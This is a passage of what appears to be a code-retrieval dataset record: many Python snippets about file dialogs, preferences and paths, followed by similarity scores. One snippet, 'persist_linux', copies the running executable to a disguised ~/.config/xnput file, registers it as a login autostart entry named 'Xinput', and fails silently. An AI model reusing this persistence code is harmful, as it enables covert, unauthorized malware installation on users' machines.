PhotoImage(file=\"Resources/Icons/Back Icon #2.png\")\r\n self.back_button = Button(self.search_frame, image=self.back_image, bg=\"#ffffff\", command=self.display_media)\r\n\r\n self.search_entry = ttk.Entry(self.search_frame, width=50)\r\n self.search_button = ttk.Button(self.search_frame, text=\"Search\",\r\n command=lambda entry=self.search_entry: self.search(self.search_entry))\r\n # self.advanced_search_button = ttk.Button(self.search_frame, text=\"Advanced Search...\")\r\n\r\n self.header = Label(self.media_frame, text=\"Available media:\")\r\n\r\n # This label will display when the user attempts to add an already-existent media file\r\n self.already_exists = Label(self.folder_frame, text=\"\")\r\n\r\n self.button_frame = Frame()\r\n\r\n # The button that allows the user to add media files from other sources\r\n self.add_music_button = ttk.Button(self.button_frame, text=\"Add Media...\", command=self.add_media_dialog)\r\n\r\n # Savelist-related variables\r\n self.create_savelist_button = ttk.Button(self.button_frame, text=\"Create Savelist...\",\r\n command=self.create_savelist)\r\n\r\n self.quit_button = ttk.Button(self.button_frame, text=\"Exit\", command=self.destroy)\r\n\r\n self.archive_name = StringVar()\r\n self.archive_name.set(\"\")\r\n\r\n # We are storing the length of the longest item in the media list in order to be able to modify the size of the\r\n # scrollable area (if necessary).\r\n self.longest_item_length = 0\r\n\r\n self.library_items = [] # The array storing info for every media file (name, buttons, metadata etc.)\r\n\r\n self.process_widgets()\r\n\r\n 
self.load_interface()\r\n\r\n self.lift()\r\n\r\n print(\"Graphical user interface loaded.\")", "def fromFile(filename: unicode) -> ghidra.framework.ApplicationProperties:\n ...", "def __init__(self, dialog_title='', dialog_format='',\n start_dir=os.path.expanduser('~/'),\n icon_size=(12, 20), minimal_width=200,\n browse_label='Browse', on_open=None,\n reload_button=True, reload_label='Reload',\n recent_files=None, directory_aliases=None,\n allow_empty=True, empty_file_label='(none)'):\n super().__init__()\n self.dialog_title = dialog_title\n self.dialog_format = dialog_format\n self.start_dir = start_dir\n\n # Recent files should also contain `empty_file_label` so\n # when (none) is selected this is stored in settings.\n self.recent_files = recent_files if recent_files is not None else []\n self.directory_aliases = directory_aliases or {}\n self.allow_empty = allow_empty\n self.file_combo = None\n self.empty_file_label = empty_file_label\n if self.empty_file_label not in self.recent_files \\\n and (self.allow_empty or not self.recent_files):\n self.recent_files.append(self.empty_file_label)\n\n self.check_existence()\n self.on_open.connect(on_open)\n\n layout = QHBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n\n if recent_files is not None:\n self.file_combo = QComboBox()\n self.file_combo.setMinimumWidth(minimal_width)\n self.file_combo.activated[int].connect(self.select)\n self.update_combo()\n layout.addWidget(self.file_combo)\n\n self.browse_button = QPushButton(browse_label)\n self.browse_button.setFocusPolicy(Qt.NoFocus)\n self.browse_button.clicked.connect(self.browse)\n self.browse_button.setIcon(self.style()\n .standardIcon(QStyle.SP_DirOpenIcon))\n self.browse_button.setIconSize(QSize(*icon_size))\n self.browse_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n layout.addWidget(self.browse_button)\n\n if reload_button:\n self.reload_button = QPushButton(reload_label)\n self.reload_button.setFocusPolicy(Qt.NoFocus)\n self.reload_button.clicked.connect(self.reload)\n self.reload_button.setIcon(self.style()\n .standardIcon(QStyle.SP_BrowserReload))\n self.reload_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.reload_button.setIconSize(QSize(*icon_size))\n layout.addWidget(self.reload_button)", "def __init__(self, file_system, mount_point, path_attributes=None):\n super(FileSystemWinRegistryFileReader, self).__init__()\n self._file_system = file_system\n self._path_resolver = windows_path_resolver.WindowsPathResolver(\n file_system, mount_point)\n\n if path_attributes:\n for attribute_name, attribute_value in iter(path_attributes.items()):\n # TODO: fix the call to this class and make sure only relevant\n # values are passed.\n if attribute_name == u'systemroot':\n self._path_resolver.SetEnvironmentVariable(\n u'SystemRoot', attribute_value)\n\n elif attribute_name == u'userprofile':\n self._path_resolver.SetEnvironmentVariable(\n u'UserProfile', attribute_value)", "def open_preferences(self):\n result = OptionsDialog.get_options(self.settings,\n TcamView.has_dutils())\n\n if result:\n log.info(\"Saving settings\")\n else:\n log.info(\"Settings not saved\")\n\n if self.view:\n self.view.set_settings(self.settings)\n\n self.get_focus()", "def setFile(self, filename): #$NON-NLS-1$\r", "def onPreferences():\n cpp.createWidgets()\n dialog = cpp.dialog()\n dialog.show()", "def FileOpenDialog( message, wildcard, style=0, defaultDir=os.getcwd(), defaultFile='' ):\n style = style | wx.OPEN | wx.CHANGE_DIR\n return FileDialog( message, wildcard, style, 
defaultDir, defaultFile )", "def browse( self ):\n Tk.Tk().withdraw()\n filename = askopenfilename( initialdir = self.initialdir,\n title = self.title ,\n filetypes = self.filetypes )\n\n if filename == \"\":\n return\n\n self.set_text( filename )\n #rint( f\"get_text = {self.get_text()}\", flush = True )", "def setText(self, path, toNative=True):\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n self._setEditorText(path)\n else:\n if toNative:\n path = Utilities.toNativeSeparators(path)\n self._setEditorText(path)\n if self._completer:\n self._completer.setRootPath(path)", "def browse_file_dialog():\n root = Tkinter.Tk()\n # Make window almost invisible to focus it and ensure directory browser\n # doesn't end up loading in the background behind main window.\n root.withdraw()\n root.overrideredirect(True)\n root.geometry('0x0+0+0')\n root.deiconify()\n root.lift()\n root.focus_force()\n root.update()\n file_path = tkFileDialog.askopenfilename()\n root.destroy()\n if file_path:\n return os.path.normpath(file_path)\n else:\n return file_path", "def setDefaultSettings():\n if PLATFORM == 'Windows':\n font = 'Consolas'\n else:\n font = 'Monospace'\n\n preferenceNode = nuke.toNode('preferences')\n # viewer settings\n preferenceNode['maxPanels'].setValue(5)\n preferenceNode['TextureSize'].setValue('2048x2048')\n preferenceNode['viewer_bg_color_3D'].setValue(1280068863)\n preferenceNode['viewer_fg_color_3D'].setValue(4294967295L)\n preferenceNode['Viewer3DControlEmulation'].setValue('Maya')\n preferenceNode['middleButtonPans'].setValue(False)\n preferenceNode['dot_node_scale'].setValue(1.5)\n\n # script editor settings\n preferenceNode['clearOnSuccess'].setValue(False)\n preferenceNode['echoAllCommands'].setValue(True)\n preferenceNode['ScriptEditorFont'].setValue(font)\n preferenceNode['ScriptEditorFontSize'].setValue(12.0)\n preferenceNode['kwdsFgColour'].setValue(2629566719L)\n preferenceNode['stringLiteralsFgColourDQ'].setValue(10354943)\n preferenceNode['stringLiteralsFgColourSQ'].setValue(10354943)\n preferenceNode['commentsFgColour'].setValue(2442236415L)", "def saveConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getSaveFileName( self, \"Save Full Config As...\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.saveConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def __init__(self, desktopentry = None, parent = None):\n\t\tgtk.Dialog.__init__(self, parent = parent)\n\t\tself.set_icon_from_file(\"pixmaps/ubuntu-tweak.png\")\n\n\t\tlbl1 = gtk.Label()\n\t\tlbl1.set_markup(_(\"<b>Name:</b>\"));\n\t\tlbl2 = gtk.Label()\n\t\tlbl2.set_markup(_(\"<b>Command:</b>\"));\n\t\tlbl3 = gtk.Label()\n\t\tlbl3.set_markup(_(\"<b>Comment:</b>\"));\n\n\t\tself.pm_name = gtk.Entry ();\n\t\tself.pm_name.connect(\"activate\", self.on_entry_activate)\n\t\tself.pm_cmd = gtk.Entry ();\n\t\tself.pm_cmd.connect(\"activate\", self.on_entry_activate)\n\t\tself.pm_comment = gtk.Entry ();\n\t\tself.pm_comment.connect(\"activate\", self.on_entry_activate)\n\n\t\tif desktopentry:\n\t\t\tself.set_title(_(\"Edit Startup Program\"))\n\t\t\tself.pm_name.set_text(desktopentry.getName())\n\t\t\tself.pm_cmd.set_text(desktopentry.getExec())\n\t\t\tself.pm_comment.set_text(desktopentry.getComment())\n\t\telse:\n\t\t\tself.set_title(_(\"New Startup Program\"))\n\n\t\tbutton = gtk.Button(_(\"_Browse\"))\n\t\tbutton.connect(\"clicked\", self.on_choose_program)\n\t\t\n\t\thbox = gtk.HBox(False, 
5)\n\t\thbox.pack_start(self.pm_cmd)\n\t\thbox.pack_start(button, False, False, 0)\n\n\t\ttable = gtk.Table(3, 2)\n\t\ttable.attach(lbl1, 0, 1, 0, 1, ypadding = 10)\n\t\ttable.attach(lbl2, 0, 1, 1, 2, ypadding = 10)\n\t\ttable.attach(lbl3, 0, 1, 2, 3, ypadding = 10)\n\t\ttable.attach(self.pm_name, 1, 2, 0, 1)\n\t\ttable.attach(hbox, 1, 2, 1, 2)\n\t\ttable.attach(self.pm_comment, 1, 2, 2, 3)\n\n\t\tself.vbox.pack_start(table)\n\n\t\tself.add_button(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL)\n\t\tself.add_button(gtk.STOCK_OK, gtk.RESPONSE_OK)\n\n\t\tself.set_default_response(gtk.RESPONSE_OK)\n\n\t\tself.show_all()", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def test_plugin_macosx_terminal_notifier_invalid(macos_notify_environment):\n\n obj = apprise.Apprise.instantiate('macosx://', suppress_exceptions=False)\n\n # Let's disrupt the path location.\n obj.notify_path = 'invalid_missing-file'\n assert not os.path.isfile(obj.notify_path)\n\n assert obj.notify(title='title', body='body',\n notify_type=apprise.NotifyType.INFO) is False", "def setPreferencesAtStartup(self):\n\t\tif os.path.isfile(self.userPrefsFileName):\n\t\t\tprefs = open(self.userPrefsFileName, 'r')\n\t\t\tprefsLine = prefs.readline()\n\t\t\tprefs.close()\n\t\t\t\n\t\t\tfor i in range(0,len(prefsLine)):\n\t\t\t\tc = prefsLine[i]\n\t\t\t\tif c is not \"/\":\n\t\t\t\t\tself.setPreference(c)\n\t\t\t\telse:\n\t\t\t\t\tself.setPreference(prefsLine[i:])\n\t\t\t\t\tbreak", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def PromptPathOpenCmd(self):\n defaultPath = DEFAULT_PATH_TST_FILES\n defaultName = \"\"\n \n dlgSave = wxFileDialog(self, \"Run Command File\", defaultPath, defaultName,\n \"*.tst|*.*\", wxOPEN|wxCHANGE_DIR)\n if dlgSave.ShowModal() == wxID_OK:\n path = dlgSave.GetPath()\n else:\n path = None\n dlgSave.Destroy()\n return path", "def setEnvironment ( localPath ) :\r\n\r\n gtkPath = localPath + \"GTK\" + os.sep + \"bin\"\r\n\r\n tclPath = localPath + \"tcl\"\r\n\r\n os.environ[ \"PATH\" ] = os.environ[ \"PATH\" ] + \";\" + gtkPath + \";\" + tclPath + \";\"\r\n\r\n os.environ[ \"TCL_LIBRARY\" ] = tclPath + os.sep + \"tcl8.4\"\r\n\r\n os.environ[ \"TK_LIBRARY\" ] = tclPath + os.sep + \"tk8.4\"\r\n\r\n os.environ[ \"TIX_LIBRARY\" ] = tclPath + os.sep + \"tix8.1\"", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_SAVE)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n \n dlg.Destroy()", "def persist_linux(self) -> None:\n home_conf_dir = os.path.expanduser('~') + '/.config/'\n autostart_path = home_conf_dir + '/autostart/'\n autostart_file = autostart_path + 'xinput.desktop'\n\n if not os.path.isfile(autostart_file):\n try:\n os.makedirs(autostart_path)\n 
except OSError:\n self.fail_silently()\n\n dest = home_conf_dir + 'xnput'\n shutil.copyfile(sys.executable, dest)\n\n self.add_executable_perms(dest)\n\n with open(autostart_file, 'w') as out:\n out.write(\n '[Desktop Entry]\\nType=Application\\nX-GNOME-Autostart-enabled=true\\n' # noqa: E501 pylint: disable=C0301\n )\n out.write('Name=Xinput\\nExec=' + dest + '\\n')\n\n self.add_executable_perms(autostart_file)\n\n try:\n subprocess.Popen(dest)\n except Exception: # pylint: disable=W0703\n self.fail_silently()\n\n sys.exit()", "def open_quick_settings(self):\n self.android_device_driver.adb.exec_adb_cmd(\n \"shell cmd statusbar expand-settings\").wait()", "def __init__(self, parent):\n QtGui.QDialog.__init__(self, parent)\n self.parent = parent\n self.ui = Ui_FileSelectDialog()\n self.ui.setupUi(self)\n mneRoot = os.environ.get('MNE_ROOT', '')\n if mneRoot == \"\":\n mneRoot = self.settings.value(\"MNE_ROOT\", \"\").toString()\n self.ui.lineEditMneRoot.setText(mneRoot)\n self.show()", "def action_settings(self):\n\n cur_datadir = self.config.starbound_data_dir\n settings = SettingsDialog(self)\n settings.exec()\n new_datadir = self.config.starbound_data_dir\n if new_datadir:\n if cur_datadir != new_datadir:\n self.load_data()\n self.scene.refresh(self.data)\n else:\n self.close_world()\n\n # Make sure our menus are enabled/disabled as appropriate\n self.enforce_menu_state()\n\n # Re-focus the main window\n self.activateWindow()", "def askSave(parent,title='',defaultDir='',defaultFile='',wildcard='',style=wx.OVERWRITE_PROMPT):\r\n return askOpen(parent,title,defaultDir,defaultFile,wildcard,wx.SAVE|style )", "def choosefile(self, diagtitle):\r\n root = Tk()\r\n root.withdraw()\r\n sfile = tkFileDialog.askopenfilename(\r\n parent=root,\r\n filetypes = [('.TXT files', '.txt')],\r\n title=diagtitle )\r\n return sfile", "def saveSettings(self):\n # settings object\n settings = QtCore.QSettings()\n\n # store current working directory\n settings.setValue(\"mainWindow/currentDirectory\", os.getcwd())\n\n # window size\n settings.setValue(\"mainWindow/size\", self.size())", "def open_fileDialog(self):\n\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Открыть исходный файл\", os.path.expanduser(\"~\"),\n \"XML Файлы (*.xml);;JSON Файлы (*.json)\", options=options)\n if fileName:\n file_format = fileName.split('.')[1]\n if file_format == 'xml':\n self.data_from_xml(fileName)\n elif file_format == 'json':\n self.data_from_json(fileName)\n self.msg2Statusbar.emit('Импорт из файла {0}'.format(fileName))", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilenames()\n self._import_path_var.set(filename)", "def choosefilenamedsm(self, e):\n filename = QFileDialog.getOpenFileName(self.dlg,\"Select TIFF file\",\n \"/home\", \"TIF files (*.tif);;All files (*.*)\")\n if filename:\n self.dlg.leDem.setText(filename)", "def __init__(self, terminal):\r\n super(CustomOptions, self).__init__()\r\n self.longdesc = \"\"\r\n self.terminal = terminal", "def setJFileChooserParameters(_jf, lReportOnly=False, lDefaults=False, lPackagesT=None, lApplicationsT=None, lOptionsButton=None, lNewFolderButton=None):\n\n myPrint(\"D\", \"In \", inspect.currentframe().f_code.co_name, \"()\")\n\n if not Platform.isOSX(): return\n if not isinstance(_jf, JFileChooser): return\n\n _PKG = \"JFileChooser.packageIsTraversable\"\n _APP = \"JFileChooser.appBundleIsTraversable\"\n _OPTIONS = \"JFileChooser.optionsPanelEnabled\"\n _NEWFOLDER = 
\"JFileChooser.canCreateDirectories\"\n\n # JFileChooser defaults: https://violetlib.org/vaqua/filechooser.html\n # \"JFileChooser.packageIsTraversable\" default False >> set \"true\" to allow Packages to be traversed\n # \"JFileChooser.appBundleIsTraversable\" default False >> set \"true\" to allow App Bundles to be traversed\n # \"JFileChooser.optionsPanelEnabled\" default False >> set \"true\" to allow Options button\n # \"JFileChooser.canCreateDirectories\" default False >> set \"true\" to allow New Folder button\n\n if debug or lReportOnly:\n myPrint(\"B\", \"Parameters set: ReportOnly: %s, Defaults:%s, PackagesT: %s, ApplicationsT:%s, OptionButton:%s, NewFolderButton: %s\" %(lReportOnly, lDefaults, lPackagesT, lApplicationsT, lOptionsButton, lNewFolderButton))\n txt = (\"Before setting\" if not lReportOnly else \"Reporting only\")\n for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]: myPrint(\"DB\", \"%s: '%s': '%s'\" %(pad(txt,14), pad(setting,50), _jf.getClientProperty(setting)))\n if lReportOnly: return\n\n if lDefaults:\n _jf.putClientProperty(_PKG, None)\n _jf.putClientProperty(_APP, None)\n _jf.putClientProperty(_OPTIONS, None)\n _jf.putClientProperty(_NEWFOLDER, None)\n else:\n if lPackagesT is not None: _jf.putClientProperty(_PKG, lPackagesT)\n if lApplicationsT is not None: _jf.putClientProperty(_APP, lApplicationsT)\n if lOptionsButton is not None: _jf.putClientProperty(_OPTIONS, lOptionsButton)\n if lNewFolderButton is not None: _jf.putClientProperty(_NEWFOLDER, lNewFolderButton)\n\n for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]: myPrint(\"DB\", \"%s: '%s': '%s'\" %(pad(\"After setting\",14), pad(setting,50), _jf.getClientProperty(setting)))\n\n return", "def internalVar(*args, userAppDir: bool=True, userBitmapsDir: bool=True, userHotkeyDir:\n bool=True, userMarkingMenuDir: bool=True, userPrefDir: bool=True,\n userPresetsDir: bool=True, userScriptDir: bool=True, userShelfDir: bool=True,\n userTmpDir: bool=True, userWorkspaceDir: bool=True, **kwargs)->AnyStr:\n pass", "def Save_Current_Profile(self):\r\n #name = tkFileDialog.asksaveasfilename()\r\n #if( name == \"\" ):\r\n # return\r\n #self.system.Save_Current_Profile(name)\r\n self.system.Save_Current_Profile()", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n self._save_state()\n \n dlg.Destroy()", "def process_dialog_settings(self, ins):\n pass", "def open_file(self: object) -> None:\n self.file = filedialog.askopenfilename(\n initialdir= os.getcwd(),title=\"Select File\",filetypes=(\n (\"Text Files\", \"*.txt\"),(\"all files\",\"*.*\")))\n\n if self.file:\n messagebox.showinfo(\"Selected file\", \"You have selected %s\"%(\n self.file))", "def desktop_session(self):\n self.user['desktop_environment'] = {'name': self.user['desktop']}\n if self.user['desktop'] is not None:\n\n # Append required packages\n if self.user['desktop'] in [10, 11, 12]:\n self.user['desktop_environment']['requirements'] = \\\n '{xorg} {xinit} {numlock}'.format(\n xorg=self.packages['xorg'],\n xinit=self.packages['xinit'],\n numlock=self.packages['numlock'])\n else:\n self.user['desktop_environment']['requirements'] = \\\n '{xorg} {numlock}'.format(xorg=self.packages['xorg'],\n numlock=self.packages['numlock'])\n\n # Set desktop environment name\n self.user['desktop_environment']['name'] = \\\n 
self.packages['desktop']['name'][self.user['desktop']]\n\n # Append desktop environment packages\n self.user['desktop_environment']['packages'] = \\\n self.packages['desktop']['packages'][self.user['desktop']]\n\n # Append desktop environment extra packages\n if self.user['desktop_extra'] is True:\n self.user['desktop_environment']['packages'] += ' {x}'.format(\n x=self.packages['desktop']['extras'][self.user['desktop']])\n\n # Set start command\n self.user['desktop_environment']['startcmd'] = \\\n self.packages['desktop']['startcmd'][self.user['desktop']]", "def askopenfont(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def init_tkvars(self):\n\n for key in self.defaultprefs:\n value = self.defaultprefs[key]\n if type(value) is types.IntType:\n var = self.__dict__[key] = IntVar()\n elif type(value) is types.StringType:\n var = self.__dict__[key] = StringVar()\n var.set(value)\n\n self.resnum = IntVar()\n self.resnum.set(1)\n # Method for calculating Tm of primers\n self.Tm_method = StringVar()\n self.Tm_method.set('Stratagene')\n if 'Darwin' in self.currplatform:\n self.seqfontsize.set(16)\n else:\n self.seqfontsize.set(14)\n return", "def openFileDialog(self): \n self.dialog = ocempgui.widgets.Box(373, 372)\n self.dialog.topleft = 528, 205\n\n background = guiobjects.OcempImageMapTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(WINDOW_UPLOAD))\n self.dialog.add_child(background)\n \n self.listDir = guiobjects.OcempImageFileList(310, 239)\n self.listDir.topleft = 31, 60\n self.dialog.add_child(self.listDir)\n\n buttonOK = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_OK), self.buttonTooltips[\"ok\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonOK.topleft = [233, 308]\n buttonOK.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"OK\")\n self.dialog.add_child(buttonOK)\n \n buttonCancel = guiobjects.OcempImageButtonTransparent(GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_CANCEL), self.buttonTooltips[\"cancel\"], self.parent.showTooltip, self.parent.removeTooltip)\n buttonCancel.topleft = [122, 308]\n buttonCancel.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeFileDialog,\"KO\")\n self.dialog.add_child(buttonCancel)\n\n self.window.add_child (self.dialog)", "def userSetup(self):\n if self.user[\"Save\"] == \"\":\n self.ui.b_run.setEnabled(False)\n else:\n name_split = self.splitPath(self.user[\"Save\"])[-1]\n name = name_split.split(\".\")[0]\n self.ui.l_save.setText(\"Save to: \" + name)\n\n if self.user[\"GT\"] != \"\":\n self.ui.l_ground_truth.setText(self.splitPath(self.user[\"GT\"])[-1])\n\n self.ui.l_colour.setText(self.user[\"Colour\"])", "def set_file_system( # pylint: disable=too-many-arguments\n self,\n user_open,\n user_close,\n user_read,\n user_seek,\n user_async_read,\n user_async_cancel,\n block_align=-1,\n ):\n self._call_fmod(\n \"FMOD_System_SetFileSystem\",\n FILE_OPEN_CALLBACK(user_open),\n FILE_CLOSE_CALLBACK(user_close),\n FILE_READ_CALLBACK(user_read),\n FILE_SEEK_CALLBACK(user_seek),\n FILE_ASYNCREAD_CALLBACK(user_async_read),\n FILE_ASYNCCANCEL_CALLBACK(user_async_cancel),\n block_align,\n )", "def get_menubar_path():\n return 
__get_environ_path('FR_MYMENUBAR')", "def set_touched(self, file: str, cmd_call: str):\n if file is None or file.upper() == 'ALL' or file in util.OPTIONS_CUI_TYPES:\n for _f, _d in self.inputs['files'].items():\n _d[cmd_call] = {file: True} if file in util.OPTIONS_CUI_TYPES else True\n else:\n print(self.inputs['files'])\n self.inputs['files'][file][cmd_call] = True", "def setPath(self, path, toNative=True):\n self.setText(path, toNative=toNative)", "def set_environment_variables(self, time_info):\n\n for identifier, file_path in self.c_dict['INPUT_LIST_DICT'].items():\n self.add_env_var(f'METPLUS_FILELIST_{identifier.upper()}',\n file_path)\n\n super().set_environment_variables(time_info)", "def updateOptions(self):\r\n if self.varSegment.get() == \"binary\":\r\n self.checkSaveBinary.config(state=tk.DISABLED)\r\n else:\r\n self.checkSaveBinary.config(state=tk.NORMAL)", "def ch_dirDialog(self):\n\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n dir_path = QFileDialog.getExistingDirectory(self, \"Выбор папки\", os.path.expanduser(\"~\"))\n if dir_path:\n self.full_ed_lines[2].setText(dir_path + '/')\n self.change_data()\n print(dir_path)", "def set_vernissagecmd_path(path):\n\n global vernissagecmd_path # Allows us to change the global value of the path.\n if path == 'default': # Change the file path back to the default value.\n vernissagecmd_path = default_vernissagecmd_path\n print('VernissageCmd.exe path changed to {path}'.format(path=default_vernissagecmd_path))\n else: # Change the file path to the new str.\n vernissagecmd_path = path\n print('VernissageCmd.exe path changed to {path}'.format(path=path))" ]
[ "0.6109975", "0.5899527", "0.5769735", "0.55686957", "0.55619633", "0.5373799", "0.5356747", "0.5335496", "0.53288305", "0.5298387", "0.5294953", "0.52298236", "0.5206536", "0.51610196", "0.514091", "0.50889593", "0.5086334", "0.5081264", "0.5057602", "0.50511295", "0.5033079", "0.5030382", "0.5021893", "0.5000733", "0.49955884", "0.49872825", "0.4971711", "0.4971711", "0.49711868", "0.49615443", "0.4949466", "0.49484566", "0.49356413", "0.4924776", "0.49144462", "0.48984668", "0.48961508", "0.48941845", "0.48664877", "0.48643452", "0.48557493", "0.48525718", "0.48521197", "0.4847862", "0.48435688", "0.48379165", "0.4836211", "0.48340404", "0.48322386", "0.48301178", "0.48243433", "0.48216283", "0.48166823", "0.4812767", "0.48098618", "0.47788337", "0.4773693", "0.47702083", "0.47637767", "0.47637767", "0.47637767", "0.47580427", "0.47559592", "0.47550383", "0.47550383", "0.47550383", "0.47550383", "0.47475305", "0.47448057", "0.47407436", "0.4733273", "0.472993", "0.47266835", "0.47252172", "0.47215477", "0.47159752", "0.47107798", "0.47017488", "0.47004065", "0.46993214", "0.469262", "0.46824366", "0.4680678", "0.46783084", "0.46740484", "0.46729544", "0.46725237", "0.46712795", "0.46650794", "0.46640426", "0.4654937", "0.46511227", "0.46477628", "0.46470842", "0.46446076", "0.4641161", "0.46347606", "0.46326387", "0.46279356", "0.46260187" ]
0.61366576
0
Returns a Python strftime format string in accordance with MD Preferences for Date Format
def convertMDShortDateFormat_strftimeFormat(lIncludeTime=False, lForceYYMMDDHMS=False): # https://strftime.org _MDFormat = MD_REF.getPreferences().getShortDateFormat() rtnFormat = "%Y-%m-%d" if lForceYYMMDDHMS: lIncludeTime = True else: if _MDFormat == "MM/dd/yyyy": rtnFormat = "%m/%d/%Y" elif _MDFormat == "MM.dd.yyyy": rtnFormat = "%m.%d.%Y" elif _MDFormat == "yyyy/MM/dd": rtnFormat = "%Y/%m/%d" elif _MDFormat == "yyyy.MM.dd": rtnFormat = "%Y.%m.%d" elif _MDFormat == "dd/MM/yyyy": rtnFormat = "%d/%m/%Y" elif _MDFormat == "dd.MM.yyyy": rtnFormat = "%d.%m.%Y" if lIncludeTime: rtnFormat += " %H:%M:%S" return rtnFormat
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def strftime(self, format):\n return \"\"", "def strftime(self, format):\n return \"\"", "def strftime(self, format):\n return \"\"", "def strftime(dt):\n return f\"{dt:%b %d,%Y %-H:%M:%S%z}\"", "def get_strftime(date_obj: dt.datetime) -> str:\n return date_obj.strftime(get_settings().datetime_format)", "def strftime(self, dtime, format): # pylint: disable=redefined-builtin\n format = self.STRFTIME_FORMATS.get(format + \"_FORMAT\", format)\n timestring = dtime.strftime(format)\n return timestring", "def strftime(self, *args, **kwargs):\n return String(super(Datetime, self).strftime(*args, **kwargs))", "def dpn_strftime(dt):\n return dt.strftime(DPN_DATE_FORMAT)", "def custom_strftime(format, t): \n return t.strftime(format).replace(\"{S}\", str(t.day) + suffix(t.day))", "def strftime(self, date_format):\n import pandas as pd\n values = self._obj.data\n values_as_series = pd.Series(values.ravel())\n strs = values_as_series.dt.strftime(date_format)\n return strs.values.reshape(values.shape)", "def when_text(d, t=None):\n if d is None:\n return ''\n # fmt = 'yyyy MMM dd (EE)'\n # txt = d.strftime(settings.SITE.date_format_strftime)\n txt = format_date(d, 'EE ')\n txt += dd.fds(d)\n if t is not None:\n txt += ' (%s)' % t.strftime(settings.SITE.time_format_strftime)\n return txt", "def _dateFmt(self, string):\n return time.strftime('%m/%d', time.strptime(string, '%B %d, %Y'))", "def strftime_localized(dtime, format): # pylint: disable=redefined-builtin\r\n\r\n if format == \"SHORT_DATE\":\r\n format = \"%x\"\r\n elif format == \"LONG_DATE\":\r\n # Translators: the translation for \"LONG_DATE_FORMAT\" must be a format\r\n # string for formatting dates in a long form. For example, the\r\n # American English form is \"%A, %B %d %Y\".\r\n # See http://strftime.org for details.\r\n format = ugettext(\"LONG_DATE_FORMAT\")\r\n if format == \"LONG_DATE_FORMAT\":\r\n format = DEFAULT_LONG_DATE_FORMAT\r\n elif format == \"DATE_TIME\":\r\n # Translators: the translation for \"DATE_TIME_FORMAT\" must be a format\r\n # string for formatting dates with times. For example, the American\r\n # English form is \"%b %d, %Y at %H:%M\".\r\n # See http://strftime.org for details.\r\n format = ugettext(\"DATE_TIME_FORMAT\")\r\n if format == \"DATE_TIME_FORMAT\":\r\n format = DEFAULT_DATE_TIME_FORMAT\r\n elif format == \"TIME\":\r\n format = \"%X\"\r\n\r\n def process_percent_code(match):\r\n \"\"\"\r\n Convert one percent-prefixed code in the format string.\r\n\r\n Called by re.sub just below.\r\n\r\n \"\"\"\r\n code = match.group()\r\n if code == \"%\":\r\n # This only happens if the string ends with a %, which is not legal.\r\n raise ValueError(\"strftime format ends with raw %\")\r\n\r\n if code == \"%a\":\r\n part = pgettext('abbreviated weekday name', WEEKDAYS_ABBREVIATED[dtime.weekday()])\r\n elif code == \"%A\":\r\n part = pgettext('weekday name', WEEKDAYS[dtime.weekday()])\r\n elif code == \"%b\":\r\n part = pgettext('abbreviated month name', MONTHS_ABBREVIATED[dtime.month])\r\n elif code == \"%B\":\r\n part = pgettext('month name', MONTHS[dtime.month])\r\n elif code == \"%p\":\r\n part = pgettext('am/pm indicator', AM_PM[dtime.hour // 12])\r\n elif code == \"%x\":\r\n # Get the localized short date format, and recurse.\r\n # Translators: the translation for \"SHORT_DATE_FORMAT\" must be a\r\n # format string for formatting dates in a brief form. 
